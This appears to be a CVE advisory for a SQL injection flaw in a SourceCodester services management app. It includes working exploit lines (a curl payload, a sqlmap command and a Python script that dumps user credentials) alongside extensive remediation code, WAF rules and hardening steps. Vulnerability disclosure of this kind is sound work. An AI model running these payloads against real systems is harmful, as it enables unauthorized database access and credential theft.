SourceCodester Home Clean Services Management System 10, SQL Injection, CVE-2025-0294 (Critical)

How CVE-2025-0294 Works

The vulnerability exists in `/public_html/admin/process.php`, where user-supplied input in the `type`, `length` and `business` parameters is concatenated directly into SQL statements with no prepared statements or input validation. An attacker can manipulate these parameters to inject SQL and gain unauthorized database access. The flaw is exploitable remotely without authentication and allows sensitive data to be extracted, database content to be modified, or administrative operations to be executed.

DailyCVE Form

Platform: SourceCodester
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025

What Undercode Say:

Exploitation

1. Manual Exploit (curl):

curl -X POST "http://target.com/public_html/admin/process.php" -d "type=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables WHERE table_schema=database()))--&length=1&business=1"

2. SQLMap Automation:

sqlmap -u "http://target.com/public_html/admin/process.php" --data="type=1&length=1&business=1" --risk=3 --level=5 --batch

3. Exploit PoC (Python):

import requests
target = "http://target.com/public_html/admin/process.php"
payload = "1' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password) FROM users--"
data = {"type": payload, "length": "1", "business": "1"}
response = requests.post(target, data=data)
print(response.text)

Protection

1. Input Validation:

// Escaping is only a fallback; the prepared statement in step 2 is the real fix.
$type = mysqli_real_escape_string($conn, $_POST['type']);
$length = intval($_POST['length']);
$business = mysqli_real_escape_string($conn, $_POST['business']);

2. Prepared Statements:

$stmt = $conn->prepare("SELECT * FROM services WHERE type=? AND length=? AND business=?");
$stmt->bind_param("sis", $_POST['type'], $_POST['length'], $_POST['business']);
$stmt->execute();
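A fuller version of steps 1 and 2 together, as an added example that is not SourceCodester's code: a hardened handler for the three `process.php` parameters. It assumes a mysqli handle `$conn` and a `services` table with `type`, `length` and `business` columns (the column names come from the snippet above); the validation rules for `type` and `length` are assumptions about what the application expects.

```php
<?php
// Added example, not SourceCodester's code. Assumes a mysqli handle $conn
// and a `services` table with columns type, length, business.
declare(strict_types=1);
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Validate all three parameters before any SQL is built; throw on bad input
// so the query never runs with a value the code did not expect.
function validateServiceParams(array $post): array
{
    // type: short token of letters, digits, '-' and '_' only (assumed format)
    $type = $post['type'] ?? '';
    if (!is_string($type) || !preg_match('/^[A-Za-z0-9_-]{1,32}$/', $type)) {
        throw new InvalidArgumentException('invalid type');
    }
    // length: a real integer in range, rejected outright instead of intval()'d
    $length = filter_var($post['length'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 10000]]);
    if ($length === false) {
        throw new InvalidArgumentException('invalid length');
    }
    // business: free text is fine because it is bound, never concatenated
    $business = $post['business'] ?? '';
    if (!is_string($business) || strlen($business) > 100) {
        throw new InvalidArgumentException('invalid business');
    }
    return ['type' => $type, 'length' => $length, 'business' => $business];
}

// Placeholders keep data and SQL separate no matter what quotes the input holds.
function findServices(mysqli $conn, array $p): array
{
    $stmt = $conn->prepare(
        'SELECT * FROM services WHERE type = ? AND length = ? AND business = ?'
    );
    $stmt->bind_param('sis', $p['type'], $p['length'], $p['business']);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

try {
    $rows = findServices($conn, validateServiceParams($_POST));
    header('Content-Type: application/json');
    echo json_encode($rows);
} catch (InvalidArgumentException $e) {
    // Reject with 400 and leave a log line that the monitoring in step 5 can pick up.
    http_response_code(400);
    error_log('process.php rejected input: ' . $e->getMessage());
    echo 'Bad request';
}
```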

3. WAF Rules (ModSecurity):

SecRule ARGS "@detectSQLi" "id:1000,deny,status:403,msg:'SQLi Attempt'"

4. Patch Verification:

grep -r "mysqli_real_escape_string" /var/www/html/public_html/admin/

5. Log Monitoring:

# Note: POST bodies are not written to access.log, so this only catches the
# parameters when they arrive in the query string; use ModSecurity audit
# logging (see the rule in step 3) to see injected POST values.
tail -f /var/log/apache2/access.log | grep 'process.php.type=.['"'"']'

6. Database Hardening:

-- A read-only application account limits what an injection can do.
REVOKE ALL PRIVILEGES ON hcsms_db.* FROM 'app_user'@'%';
GRANT SELECT ON hcsms_db.* TO 'app_user'@'%';

Sources:

Reported By: nvd.nist.gov
Extra Source Hub: Undercode
